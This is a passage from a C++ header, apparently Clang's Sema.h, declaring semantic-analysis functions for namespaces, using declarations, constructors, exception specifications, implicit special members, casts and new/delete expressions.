UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache recording whether we've fully checked the various comparison
// category types stored in ASTContext. The bit-index corresponds to the
// integer value of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
/// library, and check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs.
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// corresponding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions)
// Finally no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
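/// A minimal usage sketch, assuming an in-scope Sema &S and a range of
/// called special members (hypothetical locals): merge each callee's
/// exception specification, then read the combined result.
/// \code
///   Sema::ImplicitExceptionSpecification Spec(S);
///   for (const CXXMethodDecl *M : CalledMembers)
///     Spec.CalledDecl(Loc, M);
///   FunctionProtoType::ExceptionSpecInfo ESI = Spec.getExceptionSpec();
/// \endcode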
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the exception specification of a
/// static member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return a CXXBindTemporaryExpr.
/// Otherwise it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
/// Wrap the expression in a ConstantExpr if it is a potential immediate
/// invocation.
ExprResult CheckForImmediateInvocation(ExprResult E, FunctionDecl *Decl);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
/// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
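/// A minimal usage sketch ('SemaRef' and 'RD' are illustrative names, not
/// fixed parts of any interface):
/// \code
///   {
///     CXXThisScopeRAII ThisScope(SemaRef, RD,
///                                Qualifiers::fromCVRMask(Qualifiers::Const));
///     // ... here 'this' is treated as having type 'const RD *' ...
///   } // the previous 'this' type is restored on destruction
/// \endcode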
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class), along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \returns true if the capture failed, false on success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
/// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
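/// For example:
/// \code
///   int(x);             // function-style cast
///   ClassType(x, y, z); // class temporary construction
///   int();              // value-initialization
/// \endcode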
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
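/// For example ('Widget' is an illustrative class):
/// \code
///   new int(42);               // no placement arguments
///   new (std::nothrow) Widget; // 'std::nothrow' is a placement argument
///   new double[n]{1.0, 2.0};   // array form with a brace initializer
/// \endcode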
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
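/// For example ('Widget' is an illustrative class), '::new Widget' searches
/// only the global scope, whereas a plain 'new Widget' also considers
/// operators declared inside 'Widget':
/// \code
///   ::new Widget; // AFS_Global
///   new Widget;   // AFS_Both: class scope first, then global scope
/// \endcode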
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression.
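/// For example:
/// \code
///   delete p;     // single-object form
///   delete[] arr; // array form (ArrayForm)
///   ::delete p;   // global form (UseGlobal)
/// \endcode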
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
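/// For example:
/// \code
///   static_assert(__is_same(int, int), "");
///   bool B = __is_trivially_copyable(int);
/// \endcode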
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
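/// For example:
/// \code
///   static_assert(__array_rank(int[2][3]) == 2, "");
///   static_assert(__array_extent(int[2][3], 1) == 3, "");
/// \endcode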
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
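/// For example (given some variable 'x'):
/// \code
///   static_assert(__is_lvalue_expr(x), "");
///   static_assert(__is_rvalue_expr(1), "");
/// \endcode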
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
/// MaybeCreateExprWithCleanups - If the current full-expression
